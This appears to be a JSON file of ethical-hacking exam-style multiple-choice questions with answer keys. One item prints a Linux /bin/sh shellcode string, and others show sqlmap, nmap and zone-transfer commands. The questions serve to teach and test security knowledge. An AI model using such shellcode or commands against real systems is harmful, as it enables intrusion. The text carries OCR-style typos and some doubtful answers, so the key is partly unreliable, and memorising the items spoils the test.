vcs2024 / B1.json
Lasion's picture
Upload B1.json
65b7d05 verified
[
{
"question": "You have successfully logged on a Linux system. You want to now cover your trade Your login attempt may\nbe logged on several files located in /var/log. Which file does NOT belongs to the list:\nA. user.log\nB. auth.fesg\nC. wtmp\nD. btmp\n",
"answer": "A"
},
{
"question": "What is the following command used for?\nsqlmap.py-u\n,,http://10.10.1.20/?p=1\n&forumaction=search\" -dbs\nA. Creating backdoors using SQL injection\nB. A Enumerating the databases in the DBMS for the URL\nC. Retrieving SQL statements being executed on the database\nD. Searching database statements at the IP address given\n",
"answer": "B"
},
{
"question": "Sam, a web developer, was instructed to incorporate a hybrid encryption software program into a web\napplication to secure email messages. Sam used an encryption software, which is a free implementation of the\nOpenPGP standard that uses both symmetric-key cryptography and asymmetric-key cryptography for\nimproved speed and secure key exchange. What is the encryption software employed by Sam for securing the\nemail messages?\nA. PGP\nB. S/MIME\nC. SMTP\nD. GPG\n",
"answer": "D"
},
{
"question": "Which of the following is assured by the use of a hash?\nA. Authentication\nB. Confidentiality\nC. Availability\nD. Integrity\n",
"answer": "D"
},
{
"question": "What is not a PCI compliance recommendation?\nA. Use a firewall between the public network and the payment card data.\nB. Use encryption to protect all transmission of card holder data over any public network.\nC. Rotate employees handling credit card transactions on a yearly basis to different departments.\nD. Limit access to card holder data to as few individuals as possible.\n",
"answer": "C"
},
{
"question": "What is the proper response for a NULL scan if the port is closed?\nA. SYN\nB. ACK\nC. FIN\nD. PSH\nE. RST\nF. No response\n",
"answer": "E"
},
{
"question": "What kind of detection techniques is being used in antivirus software that identifies malware by collecting data\nfrom multiple protected systems and instead of analyzing files locally it?s made on the provider?s\nenvironment?\nA. Behavioral based\nB. Heuristics based\nC. Honeypot based\nD. Cloud based\n",
"answer": "D"
},
{
"question": "Which type of security feature stops vehicles from crashing through the doors of a building?\nA. Bollards\nB. Receptionist\nC. Mantrap\nD. Turnstile\n",
"answer": "A"
},
{
"question": "A large mobile telephony and data network operator has a data center that houses network elements. These are\nessentially large computers running on Linux. The perimeter of the data center is secured with firewalls and\nIPS systems.\nWhat is the best security policy concerning this setup?\nA. Network elements must be hardened with user ids and strong passwords. Regular security tests and audits should be performed.\nB. As long as the physical access to the network elements is restricted, there is no need for additional measures.\nC. There is no need for specific security measures on the network elements as long as firewalls and IPSsystems exist.\nD. The operator knows that attacks and down time are inevitable and should have a backup site.\n",
"answer": "A"
},
{
"question": "Which regulation defines security and privacy controls for Federal information systems and organizations?\nA. HIPAA\nB. EU Safe Harbor\nC. PCI-DSS\nD. NIST-800-53\n",
"answer": "D"
},
{
"question": "is a set of extensions to DNS that provide the origin authentication of DNS data to DNS clients (resolvers) so\nas to reduce the threat of DNS poisoning, spoofing, and similar types of attacks.\nA. DNSSEC\nB. Resource records\nC. Resource transfer\nD. Zone transfer\n",
"answer": "A"
},
{
"question": "A hacker is an intelligent individual with excellent computer skills and the ability to explore a computer?s\nsoftware and hardware without the owner?s permission. Their intention can either be to simply gain knowledge\nor to illegally make changes.\nWhich of the following class of hacker refers to an individual who works both offensively and defensively at\nvarious times?\nA. White Hat\nB. Suicide Hacker\nC. Gray Hat\nD. Black Hat\n",
"answer": "C"
},
{
"question": "Session splicing is an IDS evasion technique in which an attacker delivers data in multiple, small sized packets\nto the target computer, making it very difficult for an IDS to detect the attack signatures. Which tool can be\nused to perform session splicing attacks?\nA. tcpsplice\nB. Burp\nC. Hydra\nD. Whisker\n",
"answer": "D"
},
{
"question": "An incident investigator asks to receive a copy of the event logs from all firewalls, proxy servers, and\nIntrusion Detection Systems (IDS) on the network of an organization that has experienced a possible breach of\nsecurity. When the investigator attempts to correlate the information in all of the logs, the sequence of many of\nthe logged events do not match up.\nWhat is the most likely cause?\nA. The network devices are not all synchronized.\nB. Proper chain of custody was not observed while collecting the logs.\nC. The attacker altered or erased events from the logs.\nD. The security breach was a false positive.\n",
"answer": "A"
},
{
"question": "A zone file consists of which of the following Resource Records (RRs)?\nA. DNS, NS, AXFR, and MX records\nB. DNS, NS, PTR, and MX records\nC. SOA, NS, AXFR, and MX records\nD. SOA, NS, A, and MX records\n",
"answer": "D"
},
{
"question": "If a tester is attempting to ping a target that exists but receives no response or a response that states the\ndestination is unreachable, ICMP may be disabled and the network may be using TCP. Which other option\ncould the tester use to get a response from a host using TCP?\nA. Traceroute\nB. Hping\nC. TCP ping\nD. Broadcast ping\n",
"answer": "B"
},
{
"question": "This wireless security protocol allows 192-bit minimum-strength security protocols and cryptographic tools to\nprotect sensitive data, such as GCMP-2S6. MMAC-SHA384, and ECDSA using a 384-bit elliptic curve.\nWhich is this wireless security protocol?\nA. WPA2 Personal\nB. WPA3-Personal\nC. WPA2-Enterprise\nD. WPA3-Enterprise\n",
"answer": "D"
},
{
"question": "John, a professional hacker, targeted an organization that uses LDAP for accessing distributed directory\nservices. He used an automated tool to anonymously query the IDAP service for sensitive information such as\nusernames. addresses, departmental details, and server names to launch further attacks on the target\norganization.\nWhat is the tool employed by John to gather information from the IDAP service?\nA. jxplorer\nB. Zabasearch\nC. EarthExplorer\nD. Ike-scan\n",
"answer": "A"
},
{
"question": "A friend of yours tells you that he downloaded and executed a file that was sent to him by a coworker. Since\nthe file did nothing when executed, he asks you for help because he suspects that he may have installed a\ntrojan on his computer.\nwhat tests would you perform to determine whether his computer Is Infected?\nA. Use ExifTool and check for malicious content.\nB. You do not check; rather, you immediately restore a previous snapshot of the operating system.\nC. Upload the file to VirusTotal.\nD. Use netstat and check for outgoing connections to strange IP addresses or domains.\n",
"answer": "D"
},
{
"question": "Which type of sniffing technique is generally referred as MiTM attack?\nA. Password Sniffing\nB. ARP Poisoning\nC. Mac Flooding\nD. DHCP Sniffing\n",
"answer": "B"
},
{
"question": "Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He\nfound the contact number of sibertech.org and dialed the number, claiming himself to represent a technical\nsupport team from a vendor. He warned that a specific server is about to be compromised and requested\nsibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual\ncommands and install malicious files, which were then used to collect and pass critical Information to\nJohnson's machine. What is the social engineering technique Steve employed in the above scenario?\nA. Quid pro quo\nB. Diversion theft\nC. Elicitation\nD. Phishing\n",
"answer": "A"
},
{
"question": "There have been concerns in your network that the wireless network component is not sufficiently secure. You\nperform a vulnerability scan of the wireless network and find that it is using an old encryption protocol that\nwas designed to mimic wired encryption, what encryption protocol is being used?\nA. WEP\nB. RADIUS\nC. WPA\nD. WPA3\n",
"answer": "A"
},
{
"question": "Wilson, a professional hacker, targets an organization for financial benefit and plans to compromise its\nsystems by sending malicious emails. For this purpose, he uses a tool to track the emails of the target and\nextracts information such as sender identities, mall servers, sender IP addresses, and sender locations from\ndifferent public sources. He also checks if an email address was leaked using the haveibeenpwned.com API.\nWhich of the following tools is used by Wilson in the above scenario?\nA. Factiva\nB. Netcraft\nC. infoga\nD. Zoominfo\n",
"answer": "C"
},
{
"question": "Allen, a professional pen tester, was hired by xpertTech solutWns to perform an attack simulation on the\norganization's network resources. To perform the attack, he took advantage of the NetBIOS API and targeted\nthe NetBIOS service. B/enumerating NetBIOS, he found that port 139 was open and could see the resources\nthat could be accessed or viewed on a remote system. He came across many NetBIOS codes during\nenumeration.\nidentify the NetBIOS code used for obtaining the messenger service running for the logged-in user?\nA. <1B>\nB. <00>\nC. <03>\nD. <20>\n",
"answer": "C"
},
{
"question": "When discussing passwords, what is considered a brute force attack?\nA. You attempt every single possibility until you exhaust all possible combinations or discover the password\nB. You threaten to use the rubber hose on someone unless they reveal their password\nC. You load a dictionary of words into your cracking program\nD. You create hashes of a large number of words and compare it with the encrypted passwords\nE. You wait until the password expires\n",
"answer": "A"
},
{
"question": "You are programming a buffer overflow exploit and you want to create a NOP sled of 200 bytes in the\nprogram exploit.c\n\nchar shellcode[]=\n\"\\x31\\xc0\\xb0\\x46\\x31\\xdb\\x31\\xc9\\xcd\\x80\\xeb\\x16\\x5b\\x31\\xc0\"\n\"\\x88\\x43\\x07\\x89\\x5b\\x08\\x89\\x43\\x0c\\xb0\\x0b\\x8d\\x4b\\x08\\x8d\"\n\"\\x53\\x0c\\xcd\\x80\\xe8\\xe5\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\"\n\"\\x68\";\n\n\n\nWhat is the hexadecimal value of NOP instruction?\nA. 0x60\nB. 0x80\nC. 0x70\nD. 0x90\n",
"answer": "D"
},
{
"question": "Yancey is a network security administrator for a large electric company. This company provides power for\nover 100, 000 people in Las Vegas. Yancey has worked for his company for over 15 years and has become\nvery successful. One day, Yancey comes in to work and finds out that the company will be downsizing and he\nwill be out of a job in two weeks. Yancey is very angry and decides to place logic bombs, viruses, Trojans, and\nbackdoors all over the network to take down the company once he has left. Yancey does not care if his actions\nland him in jail for 30 or more years, he just wants the company to pay for what they are doing to him.\nWhat would Yancey be considered?\nA. Yancey would be considered a Suicide Hacker\nB. Since he does not care about going to jail, he would be considered a Black Hat\nC. Because Yancey works for the company currently; he would be a White Hat\nD. Yancey is a Hacktivist Hacker since he is standing up to a company that is downsizing\n",
"answer": "A"
},
{
"question": "Why containers are less secure that virtual machines?\nA. Host OS on containers has a larger surface attack.\nB. Containers may full fill disk space of the host.\nC. A compromise container may cause a CPU starvation of the host.\nD. Containers are attached to the same virtual network.\n",
"answer": "A"
},
{
"question": "George is a security professional working for iTech Solutions. He was tasked with securely transferring\nsensitive data of the organization between industrial systems. In this process, he used a short-range\ncommunication protocol based on the IEEE 203.15.4 standard. This protocol is used in devices that transfer\ndata infrequently at a low rate in a restricted area, within a range of 10-100 m. What is the short-range wireless\ncommunication technology George employed in the above scenario?\nA. MQTT\nB. LPWAN\nC. Zigbee\nD. NB-IoT\n",
"answer": "C"
},
{
"question": "You are performing a penetration test for a client and have gained shell access to a Windows machine on the\ninternal network. You intend to retrieve all DNS records for the internal domain, if the DNS server is at\n192.168.10.2 and the domain name is abccorp.local, what command would you type at the nslookup prompt to\nattempt a zone transfer?\nA. list server=192.168.10.2 type=all\nB. is-d abccorp.local\nC. Iserver 192.168.10.2-t all\nD. List domain=Abccorp.local type=zone\n",
"answer": "B"
},
{
"question": "_________ is a tool that can hide processes from the process list, can hide files, registry entries, and intercept\nkeystrokes.\nA. Trojan\nB. RootKit\nC. DoS tool\nD. Scanner\nE. Backdoor\n",
"answer": "B"
},
{
"question": "Nathan is testing some of his network devices. Nathan is using Macof to try and flood the ARP cache of these\nswitches.\nIf these switches' ARP cache is successfully flooded, what will be the result?\nA. The switches will drop into hub mode if the ARP cache is successfully flooded.\nB. If the ARP cache is flooded, the switches will drop into pix mode making it less susceptible to attacks.\nC. Depending on the switch manufacturer, the device will either delete every entry in its ARP cache or reroute packets to the nearest switch.\nD. The switches will route all traffic to the broadcast address created collisions.\n",
"answer": "A"
},
{
"question": "what firewall evasion scanning technique make use of a zombie system that has low network activity as well\nas its fragment identification numbers?\nA. Decoy scanning\nB. Packet fragmentation scanning\nC. Spoof source address scanning\nD. Idle scanning\n",
"answer": "D"
},
{
"question": "Gilbert, a web developer, uses a centralized web API to reduce complexity and increase the Integrity of\nupdating and changing data. For this purpose, he uses a web service that uses HTTP methods such as PUT.\nPOST. GET. and DELETE and can improve the overall performance, visibility, scalability, reliability, and\nportability of an application. What is the type of web-service API mentioned in the above scenario?\nA. JSON-RPC\nB. SOAP API\nC. RESTful API\nD. REST API\n",
"answer": "C"
},
{
"question": "What is the BEST alternative if you discover that a rootkit has been installed on one of your computers?\nA. Copy the system files from a known good system\nB. Perform a trap and trace\nC. Delete the files and try to determine the source\nD. Reload from a previous backup\nE. Reload from known good media\n",
"answer": "E"
},
{
"question": "Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the\napplication she is working on. She utilizes a component that can process API requests and handle various\nDocker objects, such as containers, volumes. Images, and networks. What is the component of the Docker\narchitecture used by Annie in the above scenario?\nA. Docker client\nB. Docker objects\nC. Docker daemon\nD. Docker registries\n",
"answer": "C"
},
{
"question": "Widespread fraud ac Enron. WorldCom, and Tyco led to the creation of a law that was designed to improve\nthe accuracy and accountability of corporate disclosures. It covers accounting firms and third parties that\nprovide financial services to some organizations and came into effect in 2002. This law is known by what\nacronym?\nA. Fed RAMP\nB. PCIDSS\nC. SOX\nD. HIPAA\n",
"answer": "C"
},
{
"question": "Jim, a professional hacker, targeted an organization that is operating critical Industrial Infrastructure. Jim used\nNmap to scan open pons and running services on systems connected to the organization's OT network. He\nused an Nmap command to identify Ethernet/IP devices connected to the Internet and further gathered\nInformation such as the vendor name, product code and name, device name, and IP address. Which of the\nfollowing Nmap commands helped Jim retrieve the required information?\nA. nmap -Pn -sT --scan-delay 1s --max-parallelism 1 -p < Port List > < Target IP >\nB. nmap -Pn -sU -p 44818 --script enip-info < Target IP >\nC. nmap -Pn -sT -p 46824 < Target IP >\nD. nmap -Pn -sT -p 102 --script s7-info < Target IP >\n",
"answer": "B"
},
{
"question": "Abel, a security professional, conducts penetration testing in his client organization to check for any security\nloopholes. He launched an attack on the DHCP servers by broadcasting forged DHCP requests and leased all\nthe DHCP addresses available in the DHCP scope until the server could not issue any more IP addresses. This\nled to a Dos attack, and as a result, legitimate employees were unable to access the clients network. Which of\nthe following attacks did Abel perform in the above scenario?\nA. VLAN hopping\nB. DHCP starvation\nC. Rogue DHCP server attack\nD. STP attack\n",
"answer": "B"
},
{
"question": "\"Testing the network using the same methodologies and tools employed by attackers\"\n\nIdentify the correct terminology that defines the above statement.\nA. Vulnerability Scanning\nB. Penetration Testing\nC. Security Policy Implementation\nD. Designing Network Security\n",
"answer": "B"
},
{
"question": "in the Common Vulnerability Scoring System (CVSS) v3.1 severity ratings, what range does medium\nvulnerability fall in?\nA. 3.0-6.9\nB. 40-6.0\nC. 4.0-6.9\nD. 3.9-6.9\n",
"answer": "C"
},
{
"question": "In the field of cryptanalysis, what is meant by a ?rubber-hose\" attack?\nA. Attempting to decrypt cipher text by making logical assumptions about the contents of the original plaintext.\nB. Extraction of cryptographic secrets through coercion or torture.\nC. Forcing the targeted key stream through a hardware-accelerated device such as an ASIC.\nD. A backdoor placed into a cryptographic algorithm by its creator.\n",
"answer": "B"
},
{
"question": "The network team has well-established procedures to follow for creating new rules on the firewall. This\nincludes having approval from a manager prior to implementing any new rules. While reviewing the firewall\nconfiguration, you notice a recently implemented rule but cannot locate manager approval for it. What would\nbe a good step to have in the procedures for a situation like this?\nA. Have the network team document the reason why the rule was implemented without prior manager approval.\nB. Monitor all traffic using the firewall rule until a manager can approve it.\nC. Do not roll back the firewall rule as the business may be relying upon it, but try to get manager approval as soon as possible.\nD. Immediately roll back the firewall rule until a manager can approve it\n",
"answer": "D"
},
{
"question": "Susan, a software developer, wants her web API to update other applications with the latest information. For\nthis purpose, she uses a user-defined HTTP tailback or push APIs that are raised based on trigger events: when\ninvoked, this feature supplies data to other applications so that users can instantly receive real-time\nInformation.\nWhich of the following techniques is employed by Susan?\nA. web shells\nB. Webhooks\nC. REST API\nD. SOAP API\n",
"answer": "B"
},
{
"question": "What is the first step for a hacker conducting a DNS cache poisoning (DNS spoofing) attack against an\norganization?\nA. The attacker queries a nameserver using the DNS resolver.\nB. The attacker makes a request to the DNS resolver.\nC. The attacker forges a reply from the DNS resolver.\nD. The attacker uses TCP to poison the ONS resofver.\n",
"answer": "B"
},
{
"question": "Ricardo has discovered the username for an application in his targets environment. As he has a limited amount\nof time, he decides to attempt to use a list of common passwords he found on the Internet. He compiles them\ninto a list and then feeds that list as an argument into his password-cracking application, what type of attack is\nRicardo performing?\nA. Known plaintext\nB. Password spraying\nC. Brute force\nD. Dictionary\n",
"answer": "D"
},
{
"question": "Sam is working as a system administrator In an organization. He captured the principal characteristics of a\nvulnerability and produced a numerical score to reflect Its severity using CVSS v3.0 to property assess and\nprioritize the organization's vulnerability management processes. The base score that Sam obtained after\nperforming cvss rating was 4.0. What is the CVSS severity level of the vulnerability discovered by Sam in the\nabove scenario?\nA. Medium\nB. Low\nC. Critical\nD. High\n",
"answer": "A"
},
{
"question": "How is the public key distributed in an orderly, controlled fashion so that the users can be sure of the sender?s\nidentity?\nA. Hash value\nB. Private key\nC. Digital signature\nD. Digital certificate\n",
"answer": "D"
},
{
"question": "At what stage of the cyber kill chain theory model does data exfiltration occur?\nA. Actions on objectives\nB. Weaponization\nC. installation\nD. Command and control\n",
"answer": "A"
},
{
"question": "Steven connected his iPhone to a public computer that had been infected by Clark, an attacker. After\nestablishing the connection with the public computer, Steven enabled iTunes WI-FI sync on the computer so\nthat the device could continue communication with that computer even after being physically disconnected.\nNow, Clark gains access to Steven?s iPhone through the infected computer and is able to monitor and read all\nof Steven?s activity on the iPhone, even after the device is out of the communication zone.\nWhich of the following attacks is performed by Clark in above scenario?\nA. IOS trustjacking\nB. lOS Jailbreaking\nC. Exploiting SS7 vulnerability\nD. Man-in-the-disk attack\n",
"answer": "A"
},
{
"question": "During the process of encryption and decryption, what keys are shared?\nA. Private keys\nB. User passwords\nC. Public keys\nD. Public and private keys\n",
"answer": "C"
},
{
"question": "Abel, a cloud architect, uses container technology to deploy applications/software including all its\ndependencies, such as libraries and configuration files, binaries, and other resources that run independently\nfrom other processes in the cloud environment. For the containerization of applications, he follows the five-tier\ncontainer technology architecture. Currently. Abel is verifying and validating image contents, signing images,\nand sending them to the registries. Which of the following tiers of the container technology architecture Is\nAbel currently working in?\nA. Tier-1: Developer machines\nB. Tier-4: Orchestrators\nC. Tier-3: Registries\nD. Tier-2: Testing and accreditation systems\n",
"answer": "D"
},
{
"question": "What do Trinoo, TFN2k, WinTrinoo, T-Sight, and Stracheldraht have in common?\nA. All are hacking tools developed by the legion of doom\nB. All are tools that can be used not only by hackers, but also security personnel\nC. All are DDOS tools\nD. All are tools that are only effective against Windows\nE. All are tools that are only effective against Linux\n",
"answer": "C"
},
{
"question": "Larry, a security professional in an organization, has noticed some abnormalities In the user accounts on a web\nserver. To thwart evolving attacks, he decided to harden the security of the web server by adopting a\ncountermeasures to secure the accounts on the web server.\nWhich of the following countermeasures must Larry implement to secure the user accounts on the web server?\nA. Enable unused default user accounts created during the installation of an OS\nB. Enable all non-interactive accounts that should exist but do not require interactive login\nC. Limit the administrator or toot-level access to the minimum number of users\nD. Retain all unused modules and application extensions\n",
"answer": "C"
},
{
"question": "In order to tailor your tests during a web-application scan, you decide to determine which web-server version\nis hosting the application. On using the sV flag with Nmap. you obtain the following response:\n80/tcp open http-proxy Apache Server 7.1.6\nwhat Information-gathering technique does this best describe?\nA. WhOiS lookup\nB. Banner grabbing\nC. Dictionary attack\nD. Brute forcing\n",
"answer": "B"
},
{
"question": "what is the port to block first in case you are suspicious that an loT device has been compromised?\nA. 22\nB. 443\nC. 48101\nD. 80\n",
"answer": "C"
},
{
"question": "A newly joined employee. Janet, has been allocated an existing system used by a previous employee. Before\nissuing the system to Janet, it was assessed by Martin, the administrator. Martin found that there were\npossibilities of compromise through user directories, registries, and other system parameters. He also\nIdentified vulnerabilities such as native configuration tables, incorrect registry or file permissions, and\nsoftware configuration errors. What is the type of vulnerability assessment performed by Martin?\nA. Credentialed assessment\nB. Database assessment\nC. Host-based assessment\nD. Distributed assessment\n",
"answer": "C"
},
{
"question": "You are a penetration tester working to test the user awareness of the employees of the client xyz. You\nharvested two employees' emails from some public sources and are creating a client-side backdoor to send it to\nthe employees via email. Which stage of the cyber kill chain are you at?\nA. Reconnaissance\nB. Command and control\nC. Weaponization\nD. Exploitation\n",
"answer": "C"
},
{
"question": "Which file is a rich target to discover the structure of a website during web-server footprinting?\nA. Document root\nB. Robots.txt\nC. domain.txt\nD. index.html\n",
"answer": "B"
},
{
"question": "Morris, a professional hacker, performed a vulnerability scan on a target organization by sniffing the traffic on\nthe network lo identify the active systems, network services, applications, and vulnerabilities. He also obtained\nthe list of the users who are currently accessing the network. What is the type of vulnerability assessment that\nMorris performed on the target organization?\nA. internal assessment\nB. Passive assessment\nC. External assessment\nD. Credentialed assessment\n",
"answer": "B"
},
{
"question": "jane, an ethical hacker. Is testing a target organization's web server and website to identity security loopholes.\nIn this process, she copied the entire website and its content on a local drive to view the complete profile of the\nsite's directory structure, file structure, external links, images, web pages, and so on. This information helps\njane map the website's directories and gain valuable information. What is the attack technique employed by\nJane in the above scenario?\nA. website mirroring\nB. Session hijacking\nC. Web cache poisoning\nD. Website defacement\n",
"answer": "A"
},
{
"question": "What information security law or standard aims at protecting stakeholders and the general public from\naccounting errors and fraudulent activities within organizations?\nA. PCI-DSS\nB. FISMA\nC. SOX\nD. ISO/I EC 27001:2013\n",
"answer": "C"
},
{
"question": "CyberTech Inc. recently experienced SQL injection attacks on its official website. The company appointed\nBob, a security professional, to build and incorporate defensive strategies against such attacks. Bob adopted a\npractice whereby only a list of entities such as the data type, range, size, and value, which have been approved\nfor secured access, is accepted. What is the defensive technique employed by Bob in the above scenario?\nA. Output encoding\nB. Enforce least privileges\nC. Whitelist validation\nD. Blacklist validation\n",
"answer": "C"
},
{
"question": "A security analyst uses Zenmap to perform an ICMP timestamp ping scan to acquire information related to the\ncurrent time from the target host machine.\nWhich of the following Zenmap options must the analyst use to perform the ICMP timestamp ping scan?\nA. -PY\nB. -PU\nC. -PP\nD. -Pn\n",
"answer": "C"
},
{
"question": "Which of the following antennas is commonly used in communications for a frequency band of 10 MHz to\nVHF and UHF?\nA. Yagi antenna\nB. Dipole antenna\nC. Parabolic grid antenna\nD. Omnidirectional antenna\n",
"answer": "A"
},
{
"question": "Jack, a professional hacker, targets an organization and performs vulnerability scanning on the target web\nserver to identify any possible weaknesses, vulnerabilities, and misconfigurations. In this process, Jack uses an\nautomated tool that eases his work and performs vulnerability scanning to find hosts, services, and other\nvulnerabilities in the target server. Which of the following tools is used by Jack to perform vulnerability\nscanning?\nA. Infoga\nB. WebCopier Pro\nC. Netsparker\nD. NCollector Studio\n",
"answer": "C"
},
{
"question": "in this attack, an adversary tricks a victim into reinstalling an already-in-use key. This is achieved by\nmanipulating and replaying cryptographic handshake messages. When the victim reinstall the key, associated\nparameters such as the incremental transmit packet number and receive packet number are reset to their initial\nvalues. What is this attack called?\nA. Chop chop attack\nB. KRACK\nC. Evil twin\nD. Wardriving\n",
"answer": "B"
},
{
"question": "Which among the following is the best example of the third step (delivery) in the cyber kill chain?\nA. An intruder sends a malicious attachment via email to a target.\nB. An intruder creates malware to be used as a malicious attachment to an email.\nC. An intruder's malware is triggered when a target opens a malicious email attachment.\nD. An intruder's malware is installed on a target's machine.\n",
"answer": "A"
},
{
"question": "_________ is a type of phishing that targets high-profile executives such as CEOs, CFOs, politicians, and\ncelebrities who have access to confidential and highly valuable information.\nA. Spear phishing\nB. Whaling\nC. Vishing\nD. Phishing\n",
"answer": "B"
},
{
"question": "Josh has finished scanning a network and has discovered multiple vulnerable services. He knows that several\nof these usually have protections against external sources but are frequently susceptible to internal users. He\ndecides to draft an email, spoof the sender as the internal IT team, and attach a malicious file disguised as a\nfinancial spreadsheet. Before Josh sends the email, he decides to investigate other methods of getting the file\nonto the system. For this particular attempt, what was the last stage of the cyber kill chain that Josh\nperformed?\nA. Exploitation\nB. Weaponization\nC. Delivery\nD. Reconnaissance\n",
"answer": "B"
},
{
"question": "Lewis, a professional hacker, targeted the loT cameras and devices used by a target venture-capital firm. He\nused an information-gathering tool to collect information about the loT devices connected to a network, open\nports and services, and the attack surface area. Using this tool, he also generated statistical reports on broad\nusage patterns and trends. This tool helped Lewis continually monitor every reachable server and device on the\nInternet, further allowing him to exploit these devices in the network. Which of the following tools was\nemployed by Lewis in the above scenario?\nA. Censys\nB. Wapiti\nC. NeuVector\nD. Lacework\n",
"answer": "A"
},
{
"question": "Rebecca, a security professional, wants to authenticate employees who use web services for safe and secure\ncommunication. In this process, she employs a component of the Web Service Architecture, which is an\nextension of SOAP, and it can maintain the integrity and confidentiality of SOAP messages.\nWhich of the following components of the Web Service Architecture is used by Rebecca for securing the\ncommunication?\nA. WSDL\nB. WS Work Processes\nC. WS-Policy\nD. WS-Security\n",
"answer": "D"
},
{
"question": "The network users are complaining because their system are slowing down. Further, every time they attempt to\ngo a website, they receive a series of pop-ups with advertisements. What types of malware have the system\nbeen infected with?\nA. Virus\nB. Spyware\nC. Trojan\nD. Adware\n",
"answer": "D"
},
{
"question": "Geena, a cloud architect, uses a master component in the Kubernetes cluster architecture that scans newly\ngenerated pods and allocates a node to them. This component can also assign nodes based on factors such as\nthe overall resource requirement, data locality, software/hardware/policy restrictions, and internal workload\ninterventions.\nWhich of the following master components is explained in the above scenario?\nA. Kube-controller-manager\nB. Kube-scheduler\nC. Kube-apiserver\nD. Etcd cluster\n",
"answer": "B"
},
{
"question": "Calvin, a software developer, uses a feature that helps him auto-generate the content of a web page without\nmanual involvement and is integrated with SSI directives. This leads to a vulnerability in the developed web\napplication as this feature accepts remote user inputs and uses them on the page. Hackers can exploit this\nfeature and pass malicious SSI directives as input values to perform malicious activities such as modifying and\nerasing server files. What is the type of injection attack Calvin's web application is susceptible to?\nA. Server-side template injection\nB. Server-side JS injection\nC. CRLF injection\nD. Server-side includes injection\n",
"answer": "D"
},
{
"question": "In an attempt to damage the reputation of a competitor organization, Hailey, a professional hacker, gathers a\nlist of employee and client email addresses and other related information by using various search engines,\nsocial networking sites, and web spidering tools. In this process, she also uses an automated tool to gather a\nlist of words from the target website to further perform a brute-force attack on the previously gathered email\naddresses.\nWhat is the tool used by Hailey for gathering a list of words from the target website?\nA. Shadowsocks\nB. CeWL\nC. Psiphon\nD. Orbot\n",
"answer": "B"
},
{
"question": "On performing a risk assessment, you need to determine the potential impacts when some of the critical\nbusiness processes of the company interrupt its service.\nWhat is the name of the process by which you can determine those critical businesses?\nA. Emergency Plan Response (EPR)\nB. Business Impact Analysis (BIA)\nC. Risk Mitigation\nD. Disaster Recovery Planning (DRP)\n",
"answer": "B"
},
{
"question": "You are a penetration tester and are about to perform a scan on a specific server. The agreement that you\nsigned with the client contains the following specific condition for the scan: ?The attacker must scan every\nport on the server several times using a set of spoofed sources IP addresses. ? Suppose that you are using\nNmap to perform this scan. What flag will you use to satisfy this requirement?\nA. The -A flag\nB. The -g flag\nC. The -f flag\nD. The -D flag\n",
"answer": "D"
},
{
"question": "You are a security officer of a company. You had an alert from IDS that indicates that one PC on your Intranet\nis connected to a blacklisted IP address (C2 Server) on the Internet. The IP address was blacklisted just before\nthe alert. You are starting an investigation to roughly analyze the severity of the situation. Which of the\nfollowing is appropriate to analyze?\nA. IDS log\nB. Event logs on domain controller\nC. Internet Firewall/Proxy log.\nD. Event logs on the PC\n",
"answer": "C"
},
{
"question": "Jack, a disgruntled ex-employee of Incalsol Ltd., decided to inject fileless malware into Incalsol's systems. To\ndeliver the malware, he used the current employees' email IDs to send fraudulent emails embedded with\nmalicious links that seem to be legitimate. When a victim employee clicks on the link, they are directed to a\nfraudulent website that automatically loads Flash and triggers the exploit. What is the technique used byjack to\nlaunch the fileless malware on the target systems?\nA. In-memory exploits\nB. Phishing\nC. Legitimate applications\nD. Script-based injection\n",
"answer": "B"
},
{
"question": "George, an employee of an organization, is attempting to access restricted websites from an official computer.\nFor this purpose, he used an anonymizer that masked his real IP address and ensured complete and continuous\nanonymity for all his online activities. Which of the following anonymizers helps George hide his activities?\nA. https://www.baidu.com\nB. https://www.guardster.com\nC. https://www.wolframalpha.com\nD. https://karmadecay.com\n",
"answer": "B"
},
{
"question": "Which wireless security protocol replaces the personal pre-shared key (PSK) authentication with Simultaneous\nAuthentication of Equals (SAE) and is therefore resistant to offline dictionary attacks?\nA. WPA3-Personal\nB. WPA2-Enterprise\nC. Bluetooth\nD. ZigBee\n",
"answer": "A"
},
{
"question": "When you are testing a web application, it is very useful to employ a proxy tool to save every request and\nresponse. You can manually test every request and analyze the response to find vulnerabilities. You can test\nparameter and headers manually to get more precise results than if using web vulnerability scanners.\nWhat proxy tool will help you find web vulnerabilities?\nA. Maskgen\nB. Dimitry\nC. Burpsuite\nD. Proxychains\n",
"answer": "C"
},
{
"question": "A \"Server-Side Includes\" attack refers to the exploitation of a web application by injecting scripts in HTML\npages or executing arbitrary code remotely.\nWhich web-page file type, if it exists on the web server, is a strong indication that the server is vulnerable to\nthis kind of attack?\nA. .stm\nB. .html\nC. .rss\nD. .cms\n",
"answer": "A"
},
{
"question": "You have compromised a server on a network and successfully opened a shell. You aimed to identify all\noperating systems running on the network. However, as you attempt to fingerprint all machines in the network\nusing the nmap syntax below, it is not going through.\ninvictus@victim_server.~$ nmap -T4 -O 10.10.0.0/24 TCP/IP fingerprinting (for OS scan) xxxxxxx xxxxxx\nxxxxxxxxx. QUITTING!\nWhat seems to be wrong?\nA. The nmap syntax is wrong.\nB. This is a common behavior for a corrupted nmap application.\nC. The outgoing TCP/IP fingerprinting is blocked by the host firewall.\nD. OS Scan requires root privileges.\n",
"answer": "D"
},
{
"question": "A penetration tester is performing the footprinting process and is reviewing publicly available information\nabout an organization by using the Google search engine.\nWhich of the following advanced operators would allow the pen tester to restrict the search to the\norganization?s web domain?\nA. [allinurl:]\nB. [location:]\nC. [site:]\nD. [link:]\n",
"answer": "C"
},
{
"question": "Becky has been hired by a client from Dubai to perform a penetration test against one of their remote offices.\nWorking from her location in Columbus, Ohio, Becky runs her usual reconnaissance scans to obtain basic\ninformation about their network. When analyzing the results of her Whois search, Becky notices that the IP\nwas allocated to a location in Le Havre, France. Which regional Internet registry should Becky go to for\ndetailed information?\nA. ARIN\nB. APNIC\nC. RIPE\nD. LACNIC\n",
"answer": "C"
},
{
